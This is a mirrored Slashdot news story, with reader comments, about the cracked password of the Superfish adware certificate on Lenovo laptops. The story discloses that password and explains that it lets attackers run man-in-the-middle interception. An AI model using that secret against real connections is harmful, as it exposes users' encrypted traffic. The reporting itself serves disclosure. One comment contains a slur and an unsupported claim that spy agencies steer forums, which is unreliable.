Slashdot Mirror

← Back to Stories (view on slashdot.org)

Superfish Security Certificate Password Cracked, Creating New Attack Vector

Posted by timothy on from the for-this-to-work-you-may-need-windows dept.

In a followup to today's news about junk software included with Lenovo computers, an anonymous reader writes Robert Graham at Errata Security has published an article announcing his success in extracting the SuperFish self-signed security certificate from the adware which has caused Chinese computer manufacturer Lenovo such embarrassment in the last day. Since SuperFish is already capable of carrying out man-in-the-middle attacks over secure connections on the Lenovo machines which use the certificate, the disclosure of the certificate's password presents hackers with a 'a pre-installed hacking environment' which would be difficult to arrange by other means. The password, "komodia," is also the name of the Komodia Redirector framework, which allows its clients to manipulate TCP/IP network sessions "with a few simple clicks."

6 of 144 comments (clear)

  1. Re:Can Lenovo Be Sued? by Anonymous Coward · · Score: 4, Insightful

    Of course they can be sued. Can you actually win? Probably not. I would assume there's some agreement somewhere when you unwrap the computer saying you accept the software that's installed.

  2. Soo soo tired..... by dablow · · Score: 4, Insightful

    Anybody else work in IT and is starting to get depressed?

    I am just soo tried of trying to keep up with all the hacking, spying & stealing going on.......

    Constantly feeling attacked from all sides (gov, corporations etc.)

    Who can you even trust anymore?

    I would like to take a more active role in protecting my privacy and personal data, however I do not see how this is possible without completely abandoning all electronic gadgets and the internet?

    1. Re:Soo soo tired..... by webanish · · Score: 3, Insightful

      Between ignorance and despair is action...
      Start down that road, and you'll discover many a companion. Don't lose hope.

      Here's one example . I'm sure there would be many others.

  3. No words by WaffleMonster · · Score: 5, Insightful

    Preloading advertising spyware with a new computer while knowingly disabling all https and code signing security.

    There is selfish, there is stupid, there is dumb and there is criminal batshit insanity.

    Having been a fan of Lenovo for years I sincerely hope they are sued into oblivion and face criminal prosecution. No need wasting your time wondering if I will ever buy anything from them again.

    1. Re:No words by SoCalChris · · Score: 4, Insightful

      Yes, this is monumentally stupid on their part. But I'll be shocked if there's any real consequences for it. The other manufacturers are all watching to see how much backlash there is, and how quickly people forget and move on to see if this is something that they'll want to do in the future as well. Consumers won't care about this, and business will carry on as usual soon enough.

  4. LOL by Anonymous Coward · · Score: 0, Insightful

    *all* the words? Are you retarded? All hard drives are vulnerable and there is not even ONE mention of "hard drive" in the summary?

    Fuck off. You can't spin this shit. The story kept getting deleted, this OP went from "Score:1, Interesting" to "Score:0, Offtopic".

    There are special teams in NSA/GCHQ hired to monitor all major sites and discussion boards and control their narratives. Don't act stupid and pretend they don't exist here.